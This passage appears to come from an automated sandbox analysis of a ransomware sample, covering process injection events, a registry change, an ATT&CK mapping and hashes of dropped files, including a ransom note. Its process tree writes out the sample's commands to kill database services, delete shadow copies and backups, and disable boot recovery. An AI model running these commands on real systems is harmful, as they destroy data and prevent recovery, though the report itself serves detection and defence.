Token: SeCreatePagefilePrivilege	1444	WMIC.exe
Token: SeBackupPrivilege	1444	WMIC.exe
Token: SeRestorePrivilege	1444	WMIC.exe
Token: SeShutdownPrivilege	1444	WMIC.exe
Token: SeDebugPrivilege	1444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1444	WMIC.exe
Token: SeRemoteShutdownPrivilege	1444	WMIC.exe
Token: SeUndockPrivilege	1444	WMIC.exe
Token: SeManageVolumePrivilege	1444	WMIC.exe
Token: 33	1444	WMIC.exe
Token: 34	1444	WMIC.exe
Token: 35	1444	WMIC.exe
Token: SeBackupPrivilege	1108	vssvc.exe
Token: SeRestorePrivilege	1108	vssvc.exe
Token: SeAuditPrivilege	1108	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 2688	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	31
PID 2712 wrote to memory of 2688	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	31
PID 2712 wrote to memory of 2688	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	31
PID 2712 wrote to memory of 2688	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	31
PID 2688 wrote to memory of 2792	2688	cmd.exe	33
PID 2688 wrote to memory of 2792	2688	cmd.exe	33
PID 2688 wrote to memory of 2792	2688	cmd.exe	33
PID 2688 wrote to memory of 2792	2688	cmd.exe	33
PID 2712 wrote to memory of 2716	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	34
PID 2712 wrote to memory of 2716	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	34
PID 2712 wrote to memory of 2716	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	34
PID 2712 wrote to memory of 2716	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	34
PID 2716 wrote to memory of 2700	2716	cmd.exe	36
PID 2716 wrote to memory of 2700	2716	cmd.exe	36
PID 2716 wrote to memory of 2700	2716	cmd.exe	36
PID 2716 wrote to memory of 2700	2716	cmd.exe	36
PID 2700 wrote to memory of 2868	2700	cmd.exe	37
PID 2700 wrote to memory of 2868	2700	cmd.exe	37
PID 2700 wrote to memory of 2868	2700	cmd.exe	37
PID 2712 wrote to memory of 2640	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	39
PID 2712 wrote to memory of 2640	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	39
PID 2712 wrote to memory of 2640	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	39
PID 2712 wrote to memory of 2640	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	39
PID 2640 wrote to memory of 2600	2640	cmd.exe	41
PID 2640 wrote to memory of 2600	2640	cmd.exe	41
PID 2640 wrote to memory of 2600	2640	cmd.exe	41
PID 2640 wrote to memory of 2600	2640	cmd.exe	41
PID 2600 wrote to memory of 2616	2600	cmd.exe	42
PID 2600 wrote to memory of 2616	2600	cmd.exe	42
PID 2600 wrote to memory of 2616	2600	cmd.exe	42
PID 2712 wrote to memory of 2656	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	43
PID 2712 wrote to memory of 2656	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	43
PID 2712 wrote to memory of 2656	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	43
PID 2712 wrote to memory of 2656	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	43
PID 2656 wrote to memory of 3060	2656	cmd.exe	45
PID 2656 wrote to memory of 3060	2656	cmd.exe	45
PID 2656 wrote to memory of 3060	2656	cmd.exe	45
PID 2656 wrote to memory of 3060	2656	cmd.exe	45
PID 3060 wrote to memory of 2636	3060	cmd.exe	46
PID 3060 wrote to memory of 2636	3060	cmd.exe	46
PID 3060 wrote to memory of 2636	3060	cmd.exe	46
PID 2712 wrote to memory of 916	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	47
PID 2712 wrote to memory of 916	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	47
PID 2712 wrote to memory of 916	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	47
PID 2712 wrote to memory of 916	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	47
PID 916 wrote to memory of 2148	916	cmd.exe	49
PID 916 wrote to memory of 2148	916	cmd.exe	49
PID 916 wrote to memory of 2148	916	cmd.exe	49
PID 916 wrote to memory of 2148	916	cmd.exe	49
PID 2148 wrote to memory of 1096	2148	cmd.exe	50
PID 2148 wrote to memory of 1096	2148	cmd.exe	50
PID 2148 wrote to memory of 1096	2148	cmd.exe	50
PID 2712 wrote to memory of 832	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	51
PID 2712 wrote to memory of 832	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	51
PID 2712 wrote to memory of 832	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	51
PID 2712 wrote to memory of 832	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	51
PID 832 wrote to memory of 2964	832	cmd.exe	53
PID 832 wrote to memory of 2964	832	cmd.exe	53
PID 832 wrote to memory of 2964	832	cmd.exe	53
PID 832 wrote to memory of 2964	832	cmd.exe	53
PID 2964 wrote to memory of 1712	2964	cmd.exe	54
PID 2964 wrote to memory of 1712	2964	cmd.exe	54
PID 2964 wrote to memory of 1712	2964	cmd.exe	54
PID 2712 wrote to memory of 2268	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	55

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	5df80f40ad8f77e7574e4dda1629ed60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	5df80f40ad8f77e7574e4dda1629ed60N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	5df80f40ad8f77e7574e4dda1629ed60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	5df80f40ad8f77e7574e4dda1629ed60N.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1412
- C:\Users\Admin\AppData\Local\Temp\5df80f40ad8f77e7574e4dda1629ed60N.exe
  "C:\Users\Admin\AppData\Local\Temp\5df80f40ad8f77e7574e4dda1629ed60N.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3060
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2148
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2384
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:2856
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:1772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:668
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:2168
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:2236
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:2036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:936
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:1792
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:940
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:1856
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:1932
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:980
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1640
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:744
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:1960
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1732
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:2988
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:3068
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:2880
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:2456
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:2528
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:1016
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:3064
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:2996
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:1704
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:432
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:2416
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        Drops file in Windows directory
        
        PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:2784
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        Drops file in Windows directory
        
        PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1128
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        
        PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:2744
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    - System Location Discovery: System Language Discovery
    PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:2804
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:2796
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1352
- C:\Users\Admin\AppData\Local\Temp\5df80f40ad8f77e7574e4dda1629ed60N.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\5df80f40ad8f77e7574e4dda1629ed60N.exe -network
  2⤵
  - System Location Discovery: System Language Discovery
  - System policy modification
  PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1492

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\How_to_back_files.html

Filesize
5KB

MD5
079318a295a8bd8cc9525835213dd377

SHA1
a2edc20469537c081c24aa8d5cfc34987694af94

SHA256
49fba601118b602b4ec784abe7caa2492cf45aa300cb6006d87522350fa8365a

SHA512
f021012caace129f64b5b52d9a1ce6f58c5bbffa0e9140b3a4f8b86045d9795da56f6b8dab03e453e7d836ecc93520a841618e4c8a25c1a9c75d3cb2fd781a53

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
1KB

MD5
8a445af9f05ffd90e434ab0275433029

SHA1
046e2cb6d628e23d7c1900bca1f1889a243d98f5

SHA256
5bce338df25cdd120a7fc5224d06063677e8afd5a50079071a8cc26b315af104

SHA512
9c256188a66e0995ae387ddabf667c9e03ee6102e252b0b75d067af5750484a92d748dd64008dfc8170aa394d4ab0a820e07c535e13c48165a7f6d3a51b56045

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
1KB

MD5
9c3acd41c1ec75687d2cb6a30f64d3c3

SHA1
78a10f5ac1aa509b426b941f64a248855de42316

SHA256
9d6557ffb1b110e31f5fd8f8e5e8cf7e4388abdcff5cc9dbc9c5e687d48ed474

SHA512
c548c4feff55eb3469cb2db495e8633bdce9da101ebeeb0b9808d4d1dff5707dc7f5512dcba24c4de5b3fc94fa1878d7709905dc07ea9b890d885568028ef95f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
1fc98bb76ed252d583273479560e910a

SHA1
9f926cbac05efc1676b3233c38f8759e575fd8b8

SHA256
d47bb28669768d3c8935d8179785599649cd687192682f9dc7df61cbf7225be9

SHA512
d1be20b90601df44cc4245c44f57952a70f699d97295ffd3804286b713947516c1efa196db8c35ceb41a71faee16bb3e986055a27299cd9758ee13342509c844

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
1KB

MD5
1e6f90e9ad327b7fb262a9a99469ea5c

SHA1
5663fc94c324c134b515270c308e2ba34905ea7d

SHA256
1567951a9193803c4a2e79b4aef9974b1a538f28259022f411531bff5c772640

SHA512
28070e1b7a0e1f323526209aacb72c435b9c81d35ba02b2c380d95bf21a24793f343ba41f351b74cd30e34865fe09adcb931c37ffcb9d3aaeb35620e5fa0310a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_F_COL.HXK

Filesize
1KB

MD5
7e0aed34fc50963d0f6b0998c1500637

SHA1
3ac2de5b098c796993bf20aa879023e58a8c4886

SHA256
441ef90828b16467abe6060c791d272f343d012169d49b6d1b7fe45d4d46fc78

SHA512
50caa7cd5b3d5c4c1c2086d11703ae8db2b67de688dbcc0835fac8d1b2f6dffbe98c72fde8a7b7b7c6a6f99497e2d35b0af56dbd1185e6a5bb016d99c7d57f1c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK

Filesize
1KB

MD5
a14050fa33bfc27fb5e3d75dd06fed5f

SHA1
54581267163e58b9911b6496016eff883e09c746

SHA256
5a699779c5b07dd185b8fde563cb1d22fae383b40abcd587e5d679c62b60da55

SHA512
14c6b03c23f235cb1b8b545d4ad8113ff7b40ab216c1088ee54693eb7c4f317ab6b5cf2a5a52067ee0b8aa1f5631a5065472bd4821ed7576d30a849d03305964

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_F_COL.HXK

Filesize
1KB

MD5
8cfa6def37247a7c1b82c44ae7a9df27

SHA1
8e37641a218ce08d1cde22e4810051a8ee7a7f8e

SHA256
17eea7acfd3402e5af92494e32828c27d1348d0cbfb0d413f5d47cc01f03e154

SHA512
8b5f1bf943324b7dca332fa7354c1deff2295a45969294fb2b601ebb3e8740f64a9e326dc1205199232eca851de46fce681bf3cf71c1bfc0a20e6e896cd075bb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_K_COL.HXK

Filesize
1KB

MD5
3907a6ecdc888c709ca7eee3a4eeeb2d

SHA1
3870c18db7fd91a5bb65fdc78be622cf04c8072e

SHA256
bdc5f0153ed0c529ecf3f6aa1079baacfdccd0e6560779c95a97135ad8847b7f

SHA512
7e71d41ffe034d89e2e7a0454b419b2a6c500787fea161b34183449973ea898e6cc8a81bcf443963fee8c9df50f12984e834704eb42bc00129226544e3f2b253

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK

Filesize
1KB

MD5
e427a2b59c42d68902823316d6f56bf6

SHA1
2be42e97439a8ddeab9b1d345bd77f31bbb3362e

SHA256
